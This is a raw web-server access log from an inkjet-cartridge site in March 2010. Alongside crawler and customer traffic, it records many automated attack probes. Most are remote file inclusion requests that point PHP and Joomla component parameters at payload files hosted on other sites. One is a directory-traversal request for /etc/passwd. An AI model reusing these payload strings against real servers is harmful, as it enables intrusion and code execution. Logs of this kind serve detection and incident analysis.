77.92.143.92 - - [01/Mar/2010:09:34:03 -0800] "GET /write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.92.143.92 - - [01/Mar/2010:09:36:14 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.92.143.92 - - [01/Mar/2010:09:36:14 -0800] "GET /write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
77.92.143.92 - - [01/Mar/2010:09:36:14 -0800] "GET /logs//write_update.php?board_skin_path=http://www.supravis.hu//components/com_explorer/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:09:46:07 -0800] "GET /phpbb/viewtopic.php?t=2211 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
220.80.108.81 - - [01/Mar/2010:09:50:48 -0800] "GET /logs/access_100101.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
220.80.108.81 - - [01/Mar/2010:09:50:48 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
220.80.108.81 - - [01/Mar/2010:09:50:48 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:09:51:22 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:09:51:23 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:09:51:23 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:09:51:25 -0800] "GET /phpbb/posting.php?mode=quote&p=38 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
220.80.108.81 - - [01/Mar/2010:09:51:27 -0800] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:09:53:30 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:09:53:30 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:09:53:33 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:09:53:33 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:09:53:33 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [01/Mar/2010:09:54:45 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [01/Mar/2010:09:54:45 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [01/Mar/2010:09:54:45 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [01/Mar/2010:09:54:54 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [01/Mar/2010:09:54:54 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [01/Mar/2010:09:54:54 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:09:54:58 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:09:55:16 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:09:55:16 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.93.147.154 - - [01/Mar/2010:09:55:16 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:09:55:54 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
69.162.116.235 - - [01/Mar/2010:09:56:20 -0800] "GET /logs/access.log/errors.php?error=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
69.162.116.235 - - [01/Mar/2010:09:56:20 -0800] "GET /errors.php?error=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
69.162.116.235 - - [01/Mar/2010:09:56:20 -0800] "GET /logs/errors.php?error=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
165.132.30.11 - - [01/Mar/2010:09:57:16 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
58.150.99.144 - - [01/Mar/2010:09:57:50 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:09:59:24 -0800] "GET /phpbb/viewtopic.php?t=261 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
165.132.30.11 - - [01/Mar/2010:10:00:40 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
174.129.126.38 - - [01/Mar/2010:10:01:12 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "site.inkjetcartridge.com"
174.129.126.38 - - [01/Mar/2010:10:01:13 -0800] "GET /phpbb/viewtopic.php?p=1693 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "site.inkjetcartridge.com"
121.101.214.54 - - [01/Mar/2010:10:02:25 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
121.101.214.54 - - [01/Mar/2010:10:02:25 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
121.101.214.54 - - [01/Mar/2010:10:02:25 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:10:02:26 -0800] "GET /phpbb/viewtopic.php?p=380 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
121.101.214.54 - - [01/Mar/2010:10:02:27 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
121.101.214.54 - - [01/Mar/2010:10:04:48 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:10:07:48 -0800] "GET /logs/access_100301.log HTTP/1.0" 200 12355655 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:10:09:04 -0800] "GET /images/?S=A HTTP/1.0" 200 90912 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:10:10:08 -0800] "GET /links/links6_4.html HTTP/1.0" 200 28425 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
121.101.214.54 - - [01/Mar/2010:10:10:54 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:10:17:00 -0800] "GET /phpbb/viewtopic.php?t=164 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:10:19:46 -0800] "GET /phpbb/viewtopic.php?p=2271 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:10:21:23 -0800] "GET /phpbb/viewtopic.php?p=5157 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
75.40.51.60 - - [01/Mar/2010:10:25:53 -0800] "GET /email/images/inkmail21_01.gif HTTP/1.1" 200 7485 "http://us.mc515.mail.yahoo.com/mc/showMessage?.rand=2136355255&mid=1_5268_AMImvs4AABX4S3v9LAJXFkL6JX0&fid=Inbox" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
75.40.51.60 - - [01/Mar/2010:10:25:55 -0800] "GET /email/images/inkmail21_04.gif HTTP/1.1" 200 15283 "http://us.mc515.mail.yahoo.com/mc/showMessage?.rand=2136355255&mid=1_5268_AMImvs4AABX4S3v9LAJXFkL6JX0&fid=Inbox" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
75.40.51.60 - - [01/Mar/2010:10:25:56 -0800] "GET /email/images/inkmail21_05.gif HTTP/1.1" 200 15725 "http://us.mc515.mail.yahoo.com/mc/showMessage?.rand=2136355255&mid=1_5268_AMImvs4AABX4S3v9LAJXFkL6JX0&fid=Inbox" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
75.40.51.60 - - [01/Mar/2010:10:25:59 -0800] "GET /email/images/inkmail21_06.gif HTTP/1.1" 200 24052 "http://us.mc515.mail.yahoo.com/mc/showMessage?.rand=2136355255&mid=1_5268_AMImvs4AABX4S3v9LAJXFkL6JX0&fid=Inbox" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:10:32:45 -0800] "GET /phpbb/viewtopic.php?t=236 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
200.124.200.117 - - [01/Mar/2010:10:35:37 -0800] "GET /images/brother-mfc-240cn.jpg HTTP/1.0" 200 23620 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "site.inkjetcartridge.com"
200.124.200.117 - - [01/Mar/2010:10:35:37 -0800] "GET /images/brother-mfc-885cw.jpg HTTP/1.0" 200 27931 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "site.inkjetcartridge.com"
200.124.200.117 - - [01/Mar/2010:10:35:37 -0800] "GET /images/canon-pixma-ip4500.jpg HTTP/1.0" 200 28688 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "site.inkjetcartridge.com"
200.124.200.117 - - [01/Mar/2010:10:35:37 -0800] "GET /images/canon-pixma-ip3500.jpg HTTP/1.0" 200 39459 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "site.inkjetcartridge.com"
200.124.200.117 - - [01/Mar/2010:10:35:37 -0800] "GET /images/brother-mfc-5460cn.jpg HTTP/1.0" 200 20615 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "site.inkjetcartridge.com"
200.124.200.117 - - [01/Mar/2010:10:35:37 -0800] "GET /images/epson-c88.jpg HTTP/1.0" 200 6555 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "site.inkjetcartridge.com"
200.124.200.117 - - [01/Mar/2010:10:35:38 -0800] "GET /images/canon-pixma-pro9000.jpg HTTP/1.0" 200 24854 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "site.inkjetcartridge.com"
200.124.200.117 - - [01/Mar/2010:10:35:38 -0800] "GET /images/epson-r2400.jpg HTTP/1.0" 200 3335 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "site.inkjetcartridge.com"
200.124.200.117 - - [01/Mar/2010:10:35:38 -0800] "GET /images/hp-laserjet3050.jpg HTTP/1.0" 200 19965 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "site.inkjetcartridge.com"
200.124.200.117 - - [01/Mar/2010:10:35:39 -0800] "GET /images/samsung-clip-300.jpg HTTP/1.0" 200 24467 "http://www.inkjetcartridge.com/printsolutions.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "site.inkjetcartridge.com"
209.51.162.220 - - [01/Mar/2010:10:38:37 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "ShopWiki/1.0 ( +http://www.shopwiki.com/wiki/Help:Bot)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:10:48:23 -0800] "GET /phpbb/posting.php?mode=quote&p=1882 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:10:51:09 -0800] "GET /phpbb/viewtopic.php?t=108 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
200.78.235.181 - - [01/Mar/2010:10:54:54 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.78.235.181 - - [01/Mar/2010:10:54:54 -0800] "GET /logs/access_100101.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
200.78.235.181 - - [01/Mar/2010:10:54:54 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://dongja.booktobi.com//attic/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [01/Mar/2010:10:59:25 -0800] "GET /phpbb/viewtopic.php?t=514 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
95.131.66.198 - - [01/Mar/2010:11:06:34 -0800] "GET /logs/access_091201.log/home.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "site.inkjetcartridge.com"
95.131.66.198 - - [01/Mar/2010:11:06:34 -0800] "GET /logs/home.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "site.inkjetcartridge.com"
95.131.66.198 - - [01/Mar/2010:11:06:34 -0800] "GET /home.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:11:08:17 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:11:08:17 -0800] "GET /appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:11:08:17 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:11:08:21 -0800] "GET /appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:11:08:21 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
210.205.6.233 - - [01/Mar/2010:11:08:21 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.29.250 - - [01/Mar/2010:11:08:35 -0800] "GET /footer.php?_path[counter]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.29.250 - - [01/Mar/2010:11:08:35 -0800] "GET /logs//footer.php?_path[counter]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
123.143.29.250 - - [01/Mar/2010:11:08:35 -0800] "GET /logs/scripts.log%20%20//footer.php?_path[counter]=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:11:22:05 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:11:22:05 -0800] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:11:22:05 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:11:23:39 -0800] "GET /logs/scripts.log%20%20//include/bbs.lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:11:23:39 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:11:23:39 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:11:28:22 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
70.86.52.250 - - [01/Mar/2010:11:29:37 -0800] "GET /logs/scripts.log//include/bbs.lib.inc.php?site_path=http://www.formationalliance.com/images/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
219.150.205.156 - - [01/Mar/2010:11:31:18 -0800] "GET /logs/access.log/administrator/components/com_extcalendar/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "site.inkjetcartridge.com"
219.150.205.156 - - [01/Mar/2010:11:31:18 -0800] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "site.inkjetcartridge.com"
219.150.205.155 - - [01/Mar/2010:11:31:23 -0800] "GET /logs/administrator/components/com_extcalendar/errors.php?error=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:11:33:59 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:11:33:59 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:11:33:59 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:11:34:31 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
64.15.152.132 - - [01/Mar/2010:11:34:31 -0800] "GET /logs/access.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
